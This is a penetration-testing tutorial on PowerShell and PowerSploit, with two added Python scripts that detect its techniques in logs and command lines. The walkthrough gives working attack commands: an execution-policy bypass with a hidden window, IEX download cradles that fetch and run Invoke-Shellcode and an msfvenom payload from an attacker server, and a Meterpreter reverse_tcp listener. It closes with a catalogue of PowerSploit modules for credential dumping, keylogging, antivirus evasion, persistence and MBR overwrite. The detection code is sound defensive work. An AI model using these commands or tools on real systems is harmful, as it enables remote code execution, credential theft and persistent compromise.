PowerSploit: a PowerShell tool for internal-network penetration testing
PowerShell is a command-line shell and scripting environment that lets command-line users and script writers use the full power of the .NET Framework. A PowerShell script is a text file whose name carries the extension ".ps1". PowerShell depends on the .NET environment and works with .NET objects; in readability and ease of use it ranks first among all shells.
PowerShell has the following characteristics.
1. It is installed by default on Windows 7 and later.
2. PowerShell scripts can run in memory without being written to disk.
3. It almost never triggers antivirus software.
4. It can be executed remotely.
5. Many current tools are built on PowerShell.
6. It makes script-based attacks on Windows much easier.
7. cmd.exe is often blocked from running, but PowerShell is not.
8. It can be used to manage Active Directory.
The basic usage of PowerShell commands is illustrated below using file operations as the example.
1. Create a directory: New-Item whitecellclub -ItemType Directory
2. Create a file: New-Item light.txt -ItemType File
3. Delete a directory: Remove-Item whitecellclub
4. Display a text file's contents: Get-Content test.txt
5. Set a text file's contents: Set-Content test.txt -Value "hello,world!"
6. Append content: Add-Content light.txt -Value "i love you"
7. Clear contents: Clear-Content test.txt
See the PowerShell online tutorial: https://www.pstips.net/powershell-online-tutorials
Attacker machine: Kali
Target machine: Windows Server 2008 R2
First, start the web service on Kali.
Download the latest PowerSploit scripts locally: git clone https://github.com/mattifestation/PowerSploit.git
PowerSploit is a security project on GitHub that collects many PowerShell attack scripts; they are mainly used during a penetration test for reconnaissance, privilege escalation and persistence.
Then copy the PowerSploit files into the web directory.
Generate a reverse shell with msfvenom so that it can be injected with Invoke-Shellcode, and place it in the web directory as well.
(1) Executing while bypassing the local policy
If PowerShell can be run as an administrator, set the script execution policy first:
Set-ExecutionPolicy Unrestricted
By default, PowerShell scripts cannot be executed directly. The following method bypasses the security policy and runs a PowerShell script regardless of the local policy. (Note: upload PowerUp.ps1 to the target server first.)
powershell.exe -exec bypass -Command "& {Import-Module C:\PowerUp.ps1; Invoke-AllChecks}"
Bypassing the local policy and executing hidden: once the hidden command has finished, the window closes.
PowerShell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -NonI
(2) Downloading a PS1 script from a web server and executing it hidden, bypassing the local policy
Run the following commands on the target (for clarity, Invoke-Shellcode and the generated reverse-shell payload are downloaded and invoked through IEX).
IEX (New-Object Net.WebClient).DownloadString("http://192.168.1.1/CodeExecution/Invoke-Shellcode.ps1")
IEX (New-Object Net.WebClient).DownloadString("http://192.168.1.1/code")
Then execute:
Invoke-Shellcode -Shellcode $buf -Force
Set up a listener in msf:
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.47.131
Start the listener and check the result.
If the PowerShell window is closed, the connection drops as well, because the PowerShell process hosting the payload has been terminated.
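From the defender's side, the sequence above never writes a script to disk, so the artefacts that remain are the PowerShell process's command line and, on PowerShell 5.0 and later with Script Block Logging enabled, the script text recorded as Event ID 4104 in the Microsoft-Windows-PowerShell/Operational log. The following Python example, added here and not part of the original walkthrough or of PowerSploit, triages a handful of constructed script-block texts modelled on the commands above: it normalizes case and the curly quotes that PowerShell also accepts as string delimiters (the commands above were written with them), then flags the WebClient download cradle and the PowerSploit injection functions named on this page, and pulls out the fetched URLs. The sample texts, the rule set and the tag names are my own.

```python
import re

# Constructed sample script-block texts (Event ID 4104, "Creating Scriptblock text"),
# modelled on the commands in the walkthrough above plus a benign entry; not real exports.
# \u201c / \u201d are the curly double quotes that appeared in the original commands.
SAMPLE_SCRIPT_BLOCKS = [
    'IEX(New-Object Net.WebClient).DownloadString(\u201chttp://192.168.1.1/CodeExecution/Invoke-Shellcode.ps1\u201d)',
    'IEX(New-Object Net.WebClient).DownloadString("http://192.168.1.1/code")',
    'Invoke-Shellcode -Shellcode $buf -Force',
    'Get-Content test.txt',
    'iex (new-object system.net.webclient).downloadstring("http://192.168.1.1/code")',
]

# PowerShell accepts curly quotes as string delimiters, so a matcher that only knows
# " and ' misses them. Map them to their straight equivalents before matching.
_QUOTE_MAP = str.maketrans({'\u201c': '"', '\u201d': '"', '\u2018': "'", '\u2019': "'"})


def normalize(text: str) -> str:
    """Lower-case, straighten quotes and collapse whitespace, mirroring PowerShell's
    case-insensitive parsing so that IEX / iex / Iex all look alike."""
    text = text.translate(_QUOTE_MAP).lower()
    return re.sub(r'\s+', ' ', text).strip()


# Detection rules: (tag, compiled regex), evaluated against the normalized text.
# Each rule names one artefact of the technique shown above; tags are emitted in
# this order so the output is deterministic.
RULES = [
    ('download_cradle',
     re.compile(r'(\biex\b|invoke-expression).*new-object\s+(system\.)?net\.webclient\)?'
                r'\s*\.\s*download(string|file|data)')),
    ('powersploit_injection',
     re.compile(r'\binvoke-(shellcode|dllinjection|reflectivepeinjection|mimikatz)\b')),
]

URL_RE = re.compile(r'https?://[^\s"\'()]+')


def analyze_script_block(text: str) -> dict:
    """Return the rule tags that fire on one script block plus any URLs it fetches."""
    norm = normalize(text)
    tags = [tag for tag, rx in RULES if rx.search(norm)]
    # URLs are taken from the quote-straightened original so the path keeps its case.
    urls = URL_RE.findall(text.translate(_QUOTE_MAP))
    return {'tags': tags, 'urls': urls}


def triage(blocks) -> list:
    """Return (index, result) for every block that tripped at least one rule."""
    hits = []
    for i, block in enumerate(blocks):
        result = analyze_script_block(block)
        if result['tags']:
            hits.append((i, result))
    return hits


if __name__ == '__main__':
    for i, res in triage(SAMPLE_SCRIPT_BLOCKS):
        print(i, res)
```

On a Windows host the same functions would be fed the message text of Get-WinEvent output for that log; the benign Get-Content entry shows that ordinary cmdlets pass through untouched, while the first sample is tagged twice because the fetched URL itself names Invoke-Shellcode.ps1.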
The parameters used in the commands above are explained below.
1. -ExecutionPolicy Bypass (-Exec Bypass): bypasses the execution policy; this parameter is very important. By default, PowerShell's security policy does not allow commands and script files to be run. Setting this parameter bypasses any such protection rule. In penetration testing it is normally used every time a PowerShell script is run.
2. -WindowStyle Hidden (-W Hidden): hides the window.
3. -NonInteractive (-NonI): non-interactive mode; PowerShell does not present an interactive prompt to the user. -NoProfile (-NoP): the PowerShell console does not load the current user's profile.
4. -NoExit: does not exit the shell after execution. This is very important when using scripts such as keyloggers.
5. -NoLogo: starts PowerShell without displaying the copyright banner.
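The short forms listed above (-Exec, -W, -NonI, -NoP) exist because powershell.exe accepts any unambiguous prefix of a parameter name, so a detection rule that only looks for the long spellings misses the same launch written as -ep bypass -w hidden -nop -noni. The Python example below, added here and not part of the original article or of PowerSploit, canonicalizes a process command line back to full parameter names before checking it. The parameter table (minimum prefixes and the -ep/-ec aliases) is a reduced reconstruction of the console host's matching rules, limited to the parameters discussed on this page and stated as an assumption; the tokenizer is a simplification of Windows command-line quoting; the sample command lines are constructed, two of them copied from the walkthrough, and the -e value is a dummy base64 string.

```python
import re

# Constructed sample process command lines: the two from the walkthrough above, an
# abbreviated/encoded variant, and a benign scheduled-task style invocation.
SAMPLE_CMDLINES = [
    r'powershell.exe -exec bypass -Command "& {Import-Module C:\PowerUp.ps1; Invoke-AllChecks}"',
    r'PowerShell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -NonI',
    r'powershell -ep bypass -w hidden -nop -noni -e QQBCAEMA',  # -e value is a dummy string
    r'powershell.exe -NoLogo -File C:\Scripts\nightly-backup.ps1',
]

# Reduced model (an assumption, not the real parser) of how powershell.exe resolves its
# parameters: the text after the dash matches when it is a prefix of the full name at
# least as long as the minimum shown, or one of the fixed aliases (-ep, -ec).
PARAMS = [
    # canonical,        min prefix, aliases,  takes a value
    ('executionpolicy', 'ex',       ('ep',),  True),
    ('encodedcommand',  'e',        ('ec',),  True),
    ('windowstyle',     'w',        (),       True),
    ('noninteractive',  'noni',     (),       False),
    ('noprofile',       'nop',      (),       False),
    ('noexit',          'noe',      (),       False),
    ('nologo',          'nol',      (),       False),
    ('command',         'c',        (),       True),
    ('file',            'f',        (),       True),
]
TAKES_VALUE = {name: takes for name, _, _, takes in PARAMS}


def resolve_param(token: str):
    """Map '-Exec', '-ep', '-NonI', ... to the canonical parameter name, or None."""
    if not token.startswith('-'):
        return None
    key = token[1:].lower()
    for name, min_prefix, aliases, _ in PARAMS:
        if key in aliases or (len(key) >= len(min_prefix) and name.startswith(key)):
            return name
    return None


def tokenize(cmdline: str) -> list:
    """Minimal Windows command-line splitter: a double-quoted run stays one token."""
    return [quoted or bare for quoted, bare in re.findall(r'"([^"]*)"|(\S+)', cmdline)]


def canonicalize(cmdline: str) -> dict:
    """Parse a powershell.exe command line into {canonical_param: value or True}."""
    tokens = tokenize(cmdline)[1:]  # drop the executable name
    parsed = {}
    i = 0
    while i < len(tokens):
        name = resolve_param(tokens[i])
        if name is None:
            i += 1
            continue
        if not TAKES_VALUE[name]:
            parsed[name] = True
            i += 1
        elif name == 'command':
            # -Command takes everything that follows it, as powershell.exe does.
            parsed[name] = ' '.join(tokens[i + 1:])
            break
        else:
            parsed[name] = tokens[i + 1] if i + 1 < len(tokens) else ''
            i += 2
    return parsed


def indicators(cmdline: str) -> list:
    """Name the launch options from the walkthrough that are worth alerting on."""
    p = canonicalize(cmdline)
    found = []
    if p.get('executionpolicy', '').lower() in ('bypass', 'unrestricted'):
        found.append('executionpolicy=' + p['executionpolicy'].lower())
    if p.get('windowstyle', '').lower() == 'hidden':
        found.append('windowstyle=hidden')
    for switch in ('noprofile', 'noninteractive'):
        if p.get(switch):
            found.append(switch)
    if 'encodedcommand' in p:
        found.append('encodedcommand')
    return found


if __name__ == '__main__':
    for line in SAMPLE_CMDLINES:
        print(indicators(line), '<-', line)
```

Thresholding is left to the analyst: -NoProfile on its own is common in legitimate scheduled tasks, whereas the combination of a bypassed policy, a hidden window and an encoded command is the signature of the launch pattern described above.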
Windows ships two versions of PowerShell, an x64 one and an x86 one. Their execution policies do not affect each other, and they can be treated as two independent programs. The x64 version's configuration file is located under %windir%\syswow64\WindowsPowerShell\v1.0\.
PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts:
CodeExecution
Execute code on a target machine.
Invoke-DllInjection
Injects a Dll into the process ID of your choosing.
Invoke-ReflectivePEInjection
Reflectively loads a Windows PE file (DLL/EXE) into the PowerShell process, or reflectively injects a DLL into a remote process.
Invoke-Shellcode
Injects shellcode into the process ID of your choosing or within PowerShell locally.
Invoke-WmiCommand
Executes a PowerShell ScriptBlock on a target computer and returns its formatted output using WMI as a C2 channel.
ScriptModification
Modify and/or prepare scripts for execution on a compromised machine.
Out-EncodedCommand
Compresses, Base-64 encodes, and generates command-line output for a PowerShell payload script.
Out-CompressedDll
Compresses, Base-64 encodes, and outputs generated code to load a managed dll in memory.
Out-EncryptedScript
Encrypts text files/scripts.
Remove-Comment
Strips comments and extra whitespace from a script.
Persistence
Add persistence capabilities to a PowerShell script.
New-UserPersistenceOption
Configure user-level persistence options for the Add-Persistence function.
New-ElevatedPersistenceOption
Configure elevated persistence options for the Add-Persistence function.
Add-Persistence
Add persistence capabilities to a script.
Install-SSP
Installs a security support provider (SSP) dll.
Get-SecurityPackages
Enumerates all loaded security packages (SSPs).
AntivirusBypass
AV doesn't stand a chance against PowerShell!
Find-AVSignature
Locates single-byte AV signatures using the same method as DSplit from "class101".
Exfiltration
All your data belong to me!
Invoke-TokenManipulation
Lists available logon tokens. Creates processes with other users' logon tokens, and impersonates logon tokens in the current thread.
Invoke-CredentialInjection
Create logons with clear-text credentials without triggering a suspicious Event ID 4648 (Explicit Credential Logon).
Invoke-NinjaCopy
Copies a file from an NTFS partitioned volume by reading the raw volume and parsing the NTFS structures.
Invoke-Mimikatz
Reflectively loads Mimikatz 2.0 in memory using PowerShell. Can be used to dump credentials without writing anything to disk. Can be used for any functionality provided with Mimikatz.
Get-Keystrokes
Logs keys pressed, time and the active window.
Get-GPPPassword
Retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences.
Get-GPPAutologon
Retrieves autologon username and password from registry.xml if pushed through Group Policy Preferences.
Get-TimedScreenshot
A function that takes screenshots at a regular interval and saves them to a folder.
New-VolumeShadowCopy
Creates a new volume shadow copy.
Get-VolumeShadowCopy
Lists the device paths of all local volume shadow copies.
Mount-VolumeShadowCopy
Mounts a volume shadow copy.
Remove-VolumeShadowCopy
Deletes a volume shadow copy.
Get-VaultCredential
Displays Windows vault credential objects including cleartext web credentials.
Out-Minidump
Generates a full-memory minidump of a process.
Get-MicrophoneAudio
Records audio from the system microphone and saves it to disk.
Mayhem
Cause general mayhem with PowerShell.
Set-MasterBootRecord
Proof of concept code that overwrites the master boot record with the message of your choice.
Set-CriticalProcess
Causes your machine to blue screen upon exiting PowerShell.
Privesc
Tools to help with escalating privileges on a target.
PowerUp
Clearing house of common privilege escalation checks, along with some weaponization vectors.
Recon
Tools to aid in the reconnaissance phase of a penetration test.
Invoke-Portscan
Does a simple port scan using regular sockets, based (pretty) loosely on nmap.
Get-HttpStatus
Returns the HTTP Status Codes and full URL for specified paths when provided with a dictionary file.
Invoke-ReverseDnsLookup
Scans an IP address range for DNS PTR records.
PowerView
PowerView is a series of functions that perform network and Windows domain enumeration and exploitation.
Recon\Dictionaries
A collection of dictionaries used to aid in the reconnaissance phase of a penetration test. Dictionaries were taken from the following sources.
- admin.txt - http://cirt.net/nikto2/
- generic.txt - http://sourceforge.net/projects/yokoso/files/yokoso-0.1/
- sharepoint.txt - http://www.stachliu.com/resources/tools/sharepoint-hacking-diggity-project/